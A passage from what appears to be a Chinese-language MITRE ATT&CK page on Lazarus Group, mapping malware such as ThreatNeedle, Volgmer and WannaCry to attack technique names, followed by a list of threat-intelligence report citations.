S0665 ThreatNeedle [14] 从本地系统获取数据, 伪装: Match Legitimate Name or Location, 修改注册表, 创建或修改系统进程: Windows Service, 反混淆/解码文件或信息, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 文件和目录发现, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Fileless Storage, 用户执行: Malicious File, 系统信息发现, 输入工具传输, 钓鱼: Spearphishing Attachment
S0678 Torisma During Operation Dream Job, Lazarus Group used Torisma to actively monitor for new drives and remote desktop connections on an infected system.[11][12] 加密通道: Symmetric Cryptography, 反混淆/解码文件或信息, 应用层协议: Web Protocols, 执行保护, 数据编码: Standard Encoding, 本机API, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Software Packing, 系统信息发现, 系统时间发现, 系统网络连接发现, 系统网络配置发现, 通过C2信道渗出
S0263 TYPEFRAME [45] 代理, 修改注册表, 创建或修改系统进程: Windows Service, 反混淆/解码文件或信息, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify System Firewall, 文件和目录发现, 混淆文件或信息: Fileless Storage, 混淆文件或信息: Encrypted/Encoded File, 用户执行: Malicious File, 移除指标: File Deletion, 系统信息发现, 输入工具传输, 非标准端口
S0180 Volgmer [46] 伪装: Masquerade Task or Service, 修改注册表, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 加密通道: Asymmetric Cryptography, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 文件和目录发现, 本机API, 查询注册表, 混淆文件或信息: Fileless Storage, 混淆文件或信息: Encrypted/Encoded File, 移除指标: File Deletion, 系统信息发现, 系统服务发现, 系统网络连接发现, 系统网络配置发现, 输入工具传输, 进程发现
S0366 WannaCry [47][48][49][50] Exploitation of Remote Services, Lateral Tool Transfer, Windows管理规范, 代理: Multi-hop Proxy, 创建或修改系统进程: Windows Service, 加密通道: Asymmetric Cryptography, 外围设备发现, 数据加密以实现影响, 文件和目录发现, 文件和目录权限修改: Windows File and Directory Permissions Modification, 服务停止, 横向工具传输, 系统恢复抑制, 系统网络配置发现, 远程服务会话劫持: RDP Hijacking, 远程服务漏洞利用, 远程系统发现, 隐藏伪装: Hidden Files and Directories

References

  1. US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.
  2. US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.
  3. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
  4. CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.
  5. US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
  6. Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.
  7. Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.
  8. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  9. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  10. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  11. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
  12. Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
  13. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.
  14. Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.
  15. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
  16. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  17. US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.
  18. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
  19. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved September 12, 2024.
  20. USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.
  21. Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.
  22. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  23. Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
  24. Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
  25. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
  1. Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021.
  2. US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.
  3. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.
  4. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
  5. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
  6. Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.
  7. Ryan Sherstobitoff. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved August 15, 2024.
  8. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
  9. Novetta Threat Research Group 2016, February 24 Operation Blockbuster: Unraveling the Long Thread of the Sony Attack Retrieved. 2016/02/25
  10. Eduard Kovacs 2018, March 1 Five Threat Groups Target Industrial Systems: Dragos Retrieved. 2020/01/03
  11. Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
  12. US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.
  13. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
  14. Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.
  15. Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.
  16. US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.
  17. US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.
  18. US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
  19. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
  20. US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
  21. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
  22. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
  23. Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
  24. Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
  25. Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.